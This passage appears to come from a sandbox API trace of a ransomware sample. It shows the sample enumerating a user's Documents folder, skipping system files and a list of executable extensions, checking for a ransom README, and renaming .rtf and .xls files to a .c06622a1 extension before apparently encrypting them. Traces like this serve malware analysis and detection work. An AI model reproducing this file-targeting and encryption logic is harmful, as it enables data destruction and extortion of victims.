(_Str1="cur", _Str2="rtf") returned -15 [0158.745] wcslen (_String="cur") returned 0x3 [0158.745] _wcsicmp (_Str1="deskthemepack", _Str2="rtf") returned -14 [0158.745] wcslen (_String="deskthemepack") returned 0xd [0158.745] _wcsicmp (_Str1="diagcab", _Str2="rtf") returned -14 [0158.745] wcslen (_String="diagcab") returned 0x7 [0158.745] _wcsicmp (_Str1="diagcfg", _Str2="rtf") returned -14 [0158.745] wcslen (_String="diagcfg") returned 0x7 [0158.745] _wcsicmp (_Str1="diagpkg", _Str2="rtf") returned -14 [0158.745] wcslen (_String="diagpkg") returned 0x7 [0158.745] _wcsicmp (_Str1="dll", _Str2="rtf") returned -14 [0158.745] wcslen (_String="dll") returned 0x3 [0158.745] _wcsicmp (_Str1="drv", _Str2="rtf") returned -14 [0158.745] wcslen (_String="drv") returned 0x3 [0158.745] _wcsicmp (_Str1="exe", _Str2="rtf") returned -13 [0158.745] wcslen (_String="exe") returned 0x3 [0158.746] _wcsicmp (_Str1="hlp", _Str2="rtf") returned -10 [0158.746] wcslen (_String="hlp") returned 0x3 [0158.746] _wcsicmp (_Str1="icl", _Str2="rtf") returned -9 [0158.746] wcslen (_String="icl") returned 0x3 [0158.746] _wcsicmp (_Str1="icns", _Str2="rtf") returned -9 [0158.746] wcslen (_String="icns") returned 0x4 [0158.746] _wcsicmp (_Str1="ico", _Str2="rtf") returned -9 [0158.746] wcslen (_String="ico") returned 0x3 [0158.746] _wcsicmp (_Str1="ics", _Str2="rtf") returned -9 [0158.746] wcslen (_String="ics") returned 0x3 [0158.746] _wcsicmp (_Str1="idx", _Str2="rtf") returned -9 [0158.746] wcslen (_String="idx") returned 0x3 [0158.746] _wcsicmp (_Str1="ldf", _Str2="rtf") returned -6 [0158.746] wcslen (_String="ldf") returned 0x3 [0158.746] _wcsicmp (_Str1="lnk", _Str2="rtf") returned -6 [0158.746] wcslen (_String="lnk") returned 0x3 [0158.746] _wcsicmp (_Str1="mod", _Str2="rtf") returned -5 [0158.746] wcslen (_String="mod") returned 0x3 [0158.746] _wcsicmp (_Str1="mpa", _Str2="rtf") returned -5 [0158.746] wcslen (_String="mpa") returned 0x3 [0158.746] _wcsicmp (_Str1="msc", _Str2="rtf") returned -5 [0158.746] wcslen (_String="msc") returned 0x3 [0158.746] _wcsicmp (_Str1="msp", _Str2="rtf") returned -5 [0158.746] wcslen (_String="msp") returned 0x3 [0158.746] _wcsicmp (_Str1="msstyles", _Str2="rtf") returned -5 [0158.746] wcslen (_String="msstyles") returned 0x8 [0158.746] _wcsicmp (_Str1="msu", _Str2="rtf") returned -5 [0158.746] wcslen (_String="msu") returned 0x3 [0158.746] _wcsicmp (_Str1="nls", _Str2="rtf") returned -4 [0158.746] wcslen (_String="nls") returned 0x3 [0158.746] _wcsicmp (_Str1="nomedia", _Str2="rtf") returned -4 [0158.746] wcslen (_String="nomedia") returned 0x7 [0158.746] _wcsicmp (_Str1="ocx", _Str2="rtf") returned -3 [0158.746] wcslen (_String="ocx") returned 0x3 [0158.746] _wcsicmp (_Str1="prf", _Str2="rtf") returned -2 [0158.746] wcslen (_String="prf") returned 0x3 [0158.746] _wcsicmp (_Str1="ps1", _Str2="rtf") returned -2 [0158.747] wcslen (_String="ps1") returned 0x3 [0158.747] _wcsicmp (_Str1="rom", _Str2="rtf") returned -5 [0158.747] wcslen (_String="rom") returned 0x3 [0158.747] _wcsicmp (_Str1="rtp", _Str2="rtf") returned 10 [0158.747] wcslen (_String="rtp") returned 0x3 [0158.747] _wcsicmp (_Str1="scr", _Str2="rtf") returned 1 [0158.747] wcslen (_String="scr") returned 0x3 [0158.747] _wcsicmp (_Str1="shs", _Str2="rtf") returned 1 [0158.747] wcslen (_String="shs") returned 0x3 [0158.747] _wcsicmp (_Str1="spl", _Str2="rtf") returned 1 [0158.747] wcslen (_String="spl") returned 0x3 [0158.747] _wcsicmp (_Str1="sys", _Str2="rtf") returned 1 [0158.747] wcslen (_String="sys") returned 0x3 [0158.747] _wcsicmp (_Str1="theme", _Str2="rtf") returned 2 [0158.747] wcslen (_String="theme") returned 0x5 [0158.747] _wcsicmp (_Str1="themepack", _Str2="rtf") returned 2 [0158.747] wcslen (_String="themepack") returned 0x9 [0158.747] _wcsicmp (_Str1="wpx", _Str2="rtf") returned 5 [0158.747] wcslen (_String="wpx") returned 0x3 [0158.747] _wcsicmp (_Str1="lock", _Str2="rtf") returned -6 [0158.747] wcslen (_String="lock") returned 0x4 [0158.747] _wcsicmp (_Str1="key", _Str2="rtf") returned -7 [0158.747] wcslen (_String="key") returned 0x3 [0158.747] _wcsicmp (_Str1="hta", _Str2="rtf") returned -10 [0158.747] wcslen (_String="hta") returned 0x3 [0158.747] _wcsicmp (_Str1="msi", _Str2="rtf") returned -5 [0158.747] wcslen (_String="msi") returned 0x3 [0158.747] _wcsicmp (_Str1="pdb", _Str2="rtf") returned -2 [0158.747] wcslen (_String="pdb") returned 0x3 [0158.747] _wcsicmp (_Str1="sqlite", _Str2="rtf") returned 1 [0158.747] wcslen (_String="sqlite") returned 0x6 [0158.747] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\ryzv8yuuzx3ue")) returned 0x10 [0158.749] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32a0090 [0158.749] wcscpy (in: _Dest=0x32a0090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE" [0158.749] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE") returned 0x54 [0158.749] wcscpy (in: _Dest=0x32a013a, _Source="rNgfIYXf.rtf" | out: _Dest="rNgfIYXf.rtf") returned="rNgfIYXf.rtf" [0158.749] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE\\rNgfIYXf.rtf", dwFileAttributes=0x80) returned 1 [0158.754] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE\\rNgfIYXf.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\ryzv8yuuzx3ue\\rngfiyxf.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0158.754] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0158.754] ReadFile (in: hFile=0x194, lpBuffer=0x32e4a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e534, lpOverlapped=0x0 | out: lpBuffer=0x32e4a4*, lpNumberOfBytesRead=0x32e534*=0x90, lpOverlapped=0x0) returned 1 [0158.755] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e4a4, Length=0x80) returned 0x9a2c4567 [0158.755] RtlComputeCrc32 (PartialCrc=0x4567, Buffer=0x32e4a4, Length=0x80) returned 0x2088bb62 [0158.755] RtlComputeCrc32 (PartialCrc=0xbb62, Buffer=0x32e4a4, Length=0x80) returned 0x89cfeb06 [0158.755] RtlComputeCrc32 (PartialCrc=0xeb06, Buffer=0x32e4a4, Length=0x80) returned 0xe8b87068 [0158.755] RtlComputeCrc32 (PartialCrc=0x7068, Buffer=0x32e4a4, Length=0x80) returned 0xed41a280 [0158.755] CloseHandle (hObject=0x194) returned 1 [0158.755] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32b0098 [0158.755] wcscpy (in: _Dest=0x32b0098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE\\rNgfIYXf.rtf" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE\\rNgfIYXf.rtf") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE\\rNgfIYXf.rtf" [0158.755] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE\\rNgfIYXf.rtf") returned 0x61 [0158.755] wcscpy (in: _Dest=0x32b015a, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0158.756] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE\\rNgfIYXf.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\ryzv8yuuzx3ue\\rngfiyxf.rtf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE\\rNgfIYXf.rtf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\ryzv8yuuzx3ue\\rngfiyxf.rtf.c06622a1"), dwFlags=0x8) returned 1 [0158.765] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE\\rNgfIYXf.rtf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\ryzv8yuuzx3ue\\rngfiyxf.rtf.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1c8 [0158.765] CreateIoCompletionPort (FileHandle=0x1c8, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0158.765] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3510020 [0158.773] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x48aa3477 [0158.773] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2b13498b [0158.773] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x64d91849 [0158.773] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x604b1eaf [0158.773] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x13f6e4a8 [0158.773] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5a209859 [0158.773] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6d36be18 [0158.773] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x20a62318 [0158.776] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3510094, Length=0x80) returned 0x91b33a85 [0158.776] RtlComputeCrc32 (PartialCrc=0x3a85, Buffer=0x3510094, Length=0x80) returned 0xfabd4376 [0158.776] RtlComputeCrc32 (PartialCrc=0x4376, Buffer=0x3510094, Length=0x80) returned 0xacc736b7 [0158.776] RtlComputeCrc32 (PartialCrc=0x36b7, Buffer=0x3510094, Length=0x80) returned 0x66cb516a [0158.776] RtlComputeCrc32 (PartialCrc=0x516a, Buffer=0x3510094, Length=0x80) returned 0x1b23caf2 [0158.776] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3510020) returned 1 [0158.776] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32a0090) returned 1 [0158.776] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32b0098) returned 1 [0158.776] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x607bbbc0, ftCreationTime.dwHighDateTime=0x1d5e54a, ftLastAccessTime.dwLowDateTime=0xfb3ae4b0, ftLastAccessTime.dwHighDateTime=0x1d5e374, ftLastWriteTime.dwLowDateTime=0xfb3ae4b0, ftLastWriteTime.dwHighDateTime=0x1d5e374, nFileSizeHigh=0x0, nFileSizeLow=0xc921, dwReserved0=0x0, dwReserved1=0x0, cFileName="rVEW8 Q96buBc.xls", cAlternateFileName="RVEW8Q~1.XLS")) returned 1 [0158.777] _wcsicmp (_Str1="rVEW8 Q96buBc.xls", _Str2="README.c06622a1.TXT") returned 17 [0158.777] wcsstr (_Str="rVEW8 Q96buBc.xls", _SubStr="README") returned 0x0 [0158.777] _wcsicmp (_Str1="autorun.inf", _Str2="rVEW8 Q96buBc.xls") returned -17 [0158.777] wcslen (_String="autorun.inf") returned 0xb [0158.777] _wcsicmp (_Str1="boot.ini", _Str2="rVEW8 Q96buBc.xls") returned -16 [0158.777] wcslen (_String="boot.ini") returned 0x8 [0158.777] _wcsicmp (_Str1="bootfont.bin", _Str2="rVEW8 Q96buBc.xls") returned -16 [0158.777] wcslen (_String="bootfont.bin") returned 0xc [0158.777] _wcsicmp (_Str1="bootsect.bak", _Str2="rVEW8 Q96buBc.xls") returned -16 [0158.777] wcslen (_String="bootsect.bak") returned 0xc [0158.777] _wcsicmp (_Str1="desktop.ini", _Str2="rVEW8 Q96buBc.xls") returned -14 [0158.777] wcslen (_String="desktop.ini") returned 0xb [0158.777] _wcsicmp (_Str1="iconcache.db", _Str2="rVEW8 Q96buBc.xls") returned -9 [0158.777] wcslen (_String="iconcache.db") returned 0xc [0158.777] _wcsicmp (_Str1="ntldr", _Str2="rVEW8 Q96buBc.xls") returned -4 [0158.777] wcslen (_String="ntldr") returned 0x5 [0158.777] _wcsicmp (_Str1="ntuser.dat", _Str2="rVEW8 Q96buBc.xls") returned -4 [0158.777] wcslen (_String="ntuser.dat") returned 0xa [0158.777] _wcsicmp (_Str1="ntuser.dat.log", _Str2="rVEW8 Q96buBc.xls") returned -4 [0158.777] wcslen (_String="ntuser.dat.log") returned 0xe [0158.777] _wcsicmp (_Str1="ntuser.ini", _Str2="rVEW8 Q96buBc.xls") returned -4 [0158.777] wcslen (_String="ntuser.ini") returned 0xa [0158.777] _wcsicmp (_Str1="thumbs.db", _Str2="rVEW8 Q96buBc.xls") returned 2 [0158.777] wcslen (_String="thumbs.db") returned 0x9 [0158.778] _wcsicmp (_Str1="386", _Str2="xls") returned -69 [0158.778] wcslen (_String="386") returned 0x3 [0158.778] _wcsicmp (_Str1="adv", _Str2="xls") returned -23 [0158.778] wcslen (_String="adv") returned 0x3 [0158.778] _wcsicmp (_Str1="ani", _Str2="xls") returned -23 [0158.778] wcslen (_String="ani") returned 0x3 [0158.778] _wcsicmp (_Str1="bat", _Str2="xls") returned -22 [0158.778] wcslen (_String="bat") returned 0x3 [0158.778] _wcsicmp (_Str1="bin", _Str2="xls") returned -22 [0158.778] wcslen (_String="bin") returned 0x3 [0158.778] _wcsicmp (_Str1="cab", _Str2="xls") returned -21 [0158.778] wcslen (_String="cab") returned 0x3 [0158.778] _wcsicmp (_Str1="cmd", _Str2="xls") returned -21 [0158.778] wcslen (_String="cmd") returned 0x3 [0158.778] _wcsicmp (_Str1="com", _Str2="xls") returned -21 [0158.778] wcslen (_String="com") returned 0x3 [0158.778] _wcsicmp (_Str1="cpl", _Str2="xls") returned -21 [0158.778] wcslen (_String="cpl") returned 0x3 [0158.778] _wcsicmp (_Str1="cur", _Str2="xls") returned -21 [0158.778] wcslen (_String="cur") returned 0x3 [0158.778] _wcsicmp (_Str1="deskthemepack", _Str2="xls") returned -20 [0158.778] wcslen (_String="deskthemepack") returned 0xd [0158.778] _wcsicmp (_Str1="diagcab", _Str2="xls") returned -20 [0158.778] wcslen (_String="diagcab") returned 0x7 [0158.778] _wcsicmp (_Str1="diagcfg", _Str2="xls") returned -20 [0158.778] wcslen (_String="diagcfg") returned 0x7 [0158.779] _wcsicmp (_Str1="diagpkg", _Str2="xls") returned -20 [0158.779] wcslen (_String="diagpkg") returned 0x7 [0158.779] _wcsicmp (_Str1="dll", _Str2="xls") returned -20 [0158.779] wcslen (_String="dll") returned 0x3 [0158.779] _wcsicmp (_Str1="drv", _Str2="xls") returned -20 [0158.779] wcslen (_String="drv") returned 0x3 [0158.779] _wcsicmp (_Str1="exe", _Str2="xls") returned -19 [0158.779] wcslen (_String="exe") returned 0x3 [0158.779] _wcsicmp (_Str1="hlp", _Str2="xls") returned -16 [0158.779] wcslen (_String="hlp") returned 0x3 [0158.779] _wcsicmp (_Str1="icl", _Str2="xls") returned -15 [0158.779] wcslen (_String="icl") returned 0x3 [0158.779] _wcsicmp (_Str1="icns", _Str2="xls") returned -15 [0158.779] wcslen (_String="icns") returned 0x4 [0158.779] _wcsicmp (_Str1="ico", _Str2="xls") returned -15 [0158.779] wcslen (_String="ico") returned 0x3 [0158.779] _wcsicmp (_Str1="ics", _Str2="xls") returned -15 [0158.779] wcslen (_String="ics") returned 0x3 [0158.779] _wcsicmp (_Str1="idx", _Str2="xls") returned -15 [0158.779] wcslen (_String="idx") returned 0x3 [0158.779] _wcsicmp (_Str1="ldf", _Str2="xls") returned -12 [0158.779] wcslen (_String="ldf") returned 0x3 [0158.779] _wcsicmp (_Str1="lnk", _Str2="xls") returned -12 [0158.779] wcslen (_String="lnk") returned 0x3 [0158.779] _wcsicmp (_Str1="mod", _Str2="xls") returned -11 [0158.779] wcslen (_String="mod") returned 0x3 [0158.780] _wcsicmp (_Str1="mpa", _Str2="xls") returned -11 [0158.780] wcslen (_String="mpa") returned 0x3 [0158.780] _wcsicmp (_Str1="msc", _Str2="xls") returned -11 [0158.780] wcslen (_String="msc") returned 0x3 [0158.780] _wcsicmp (_Str1="msp", _Str2="xls") returned -11 [0158.780] wcslen (_String="msp") returned 0x3 [0158.780] _wcsicmp (_Str1="msstyles", _Str2="xls") returned -11 [0158.780] wcslen (_String="msstyles") returned 0x8 [0158.780] _wcsicmp (_Str1="msu", _Str2="xls") returned -11 [0158.780] wcslen (_String="msu") returned 0x3 [0158.780] _wcsicmp (_Str1="nls", _Str2="xls") returned -10 [0158.780] wcslen (_String="nls") returned 0x3 [0158.780] _wcsicmp (_Str1="nomedia", _Str2="xls") returned -10 [0158.780] wcslen (_String="nomedia") returned 0x7 [0158.780] _wcsicmp (_Str1="ocx", _Str2="xls") returned -9 [0158.780] wcslen (_String="ocx") returned 0x3 [0158.780] _wcsicmp (_Str1="prf", _Str2="xls") returned -8 [0158.780] wcslen (_String="prf") returned 0x3 [0158.780] _wcsicmp (_Str1="ps1", _Str2="xls") returned -8 [0158.780] wcslen (_String="ps1") returned 0x3 [0158.780] _wcsicmp (_Str1="rom", _Str2="xls") returned -6 [0158.780] wcslen (_String="rom") returned 0x3 [0158.780] _wcsicmp (_Str1="rtp", _Str2="xls") returned -6 [0158.780] wcslen (_String="rtp") returned 0x3 [0158.780] _wcsicmp (_Str1="scr", _Str2="xls") returned -5 [0158.780] wcslen (_String="scr") returned 0x3 [0158.781] _wcsicmp (_Str1="shs", _Str2="xls") returned -5 [0158.781] wcslen (_String="shs") returned 0x3 [0158.781] _wcsicmp (_Str1="spl", _Str2="xls") returned -5 [0158.781] wcslen (_String="spl") returned 0x3 [0158.781] _wcsicmp (_Str1="sys", _Str2="xls") returned -5 [0158.781] wcslen (_String="sys") returned 0x3 [0158.781] _wcsicmp (_Str1="theme", _Str2="xls") returned -4 [0158.781] wcslen (_String="theme") returned 0x5 [0158.781] _wcsicmp (_Str1="themepack", _Str2="xls") returned -4 [0158.781] wcslen (_String="themepack") returned 0x9 [0158.781] _wcsicmp (_Str1="wpx", _Str2="xls") returned -1 [0158.781] wcslen (_String="wpx") returned 0x3 [0158.781] _wcsicmp (_Str1="lock", _Str2="xls") returned -12 [0158.781] wcslen (_String="lock") returned 0x4 [0158.781] _wcsicmp (_Str1="key", _Str2="xls") returned -13 [0158.781] wcslen (_String="key") returned 0x3 [0158.781] _wcsicmp (_Str1="hta", _Str2="xls") returned -16 [0158.781] wcslen (_String="hta") returned 0x3 [0158.781] _wcsicmp (_Str1="msi", _Str2="xls") returned -11 [0158.781] wcslen (_String="msi") returned 0x3 [0158.781] _wcsicmp (_Str1="pdb", _Str2="xls") returned -8 [0158.781] wcslen (_String="pdb") returned 0x3 [0158.781] _wcsicmp (_Str1="sqlite", _Str2="xls") returned -5 [0158.781] wcslen (_String="sqlite") returned 0x6 [0158.782] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\ryzv8yuuzx3ue")) returned 0x10 [0158.783] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32a0090 [0158.783] wcscpy (in: _Dest=0x32a0090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE" [0158.783] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE") returned 0x54 [0158.783] wcscpy (in: _Dest=0x32a013a, _Source="rVEW8 Q96buBc.xls" | out: _Dest="rVEW8 Q96buBc.xls") returned="rVEW8 Q96buBc.xls" [0158.784] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE\\rVEW8 Q96buBc.xls", dwFileAttributes=0x80) returned 1 [0158.785] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE\\rVEW8 Q96buBc.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\ryzv8yuuzx3ue\\rvew8 q96bubc.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0158.785] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0158.785] ReadFile (in: hFile=0x1ac, lpBuffer=0x32e4a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e534, lpOverlapped=0x0 | out: lpBuffer=0x32e4a4*, lpNumberOfBytesRead=0x32e534*=0x90, lpOverlapped=0x0) returned 1 [0158.786] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e4a4, Length=0x80) returned 0x90ceaf7e [0158.786] RtlComputeCrc32 (PartialCrc=0xaf7e, Buffer=0x32e4a4, Length=0x80) returned 0x3dfe6dd [0158.786] RtlComputeCrc32 (PartialCrc=0xe6dd, Buffer=0x32e4a4, Length=0x80) returned 0x503be055 [0158.786] RtlComputeCrc32 (PartialCrc=0xe055, Buffer=0x32e4a4, Length=0x80) returned 0xf22159ea [0158.786] RtlComputeCrc32 (PartialCrc=0x59ea, Buffer=0x32e4a4, Length=0x80) returned 0x408dd764 [0158.786] CloseHandle (hObject=0x1ac) returned 1 [0158.786] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32b0098 [0158.786] wcscpy (in: _Dest=0x32b0098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE\\rVEW8 Q96buBc.xls" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE\\rVEW8 Q96buBc.xls") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE\\rVEW8 Q96buBc.xls" [0158.786] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE\\rVEW8 Q96buBc.xls") returned 0x66 [0158.786] wcscpy (in: _Dest=0x32b0164, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0158.786] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE\\rVEW8 Q96buBc.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\ryzv8yuuzx3ue\\rvew8 q96bubc.xls"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE\\rVEW8 Q96buBc.xls.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\ryzv8yuuzx3ue\\rvew8 q96bubc.xls.c06622a1"), dwFlags=0x8) returned 1 [0158.788] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\ryzV8yuUzx3uE\\rVEW8 Q96buBc.xls.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\ryzv8yuuzx3ue\\rvew8 q96bubc.xls.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1ac [0158.789] CreateIoCompletionPort (FileHandle=0x1ac, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0158.789] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x710020 [0158.794] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x55061641 [0158.795] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xce13c6e [0158.795] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5fe006b3 [0158.795] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x188c6610 [0158.795] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x33e884ca [0158.795] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6cf06de8 [0158.795] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5f12da6b [0158.795] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x68b3f4e0 [0158.798] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x710094, Length=0x80) returned 0x45e6023d [0158.798] RtlComputeCrc32 (PartialCrc=0x23d, Buffer=0x710094, Length=0x80) returned 0x8b317dc8 [0158.798] RtlComputeCrc32 (PartialCrc=0x7dc8, Buffer=0x710094, Length=0x80) returned 0xa86319bb [0158.798] RtlComputeCrc32 (PartialCrc=0x19bb, Buffer=0x710094, Length=0x80) returned 0x1afec064 [0158.798] RtlComputeCrc32 (PartialCrc=0xc064, Buffer=0x710094, 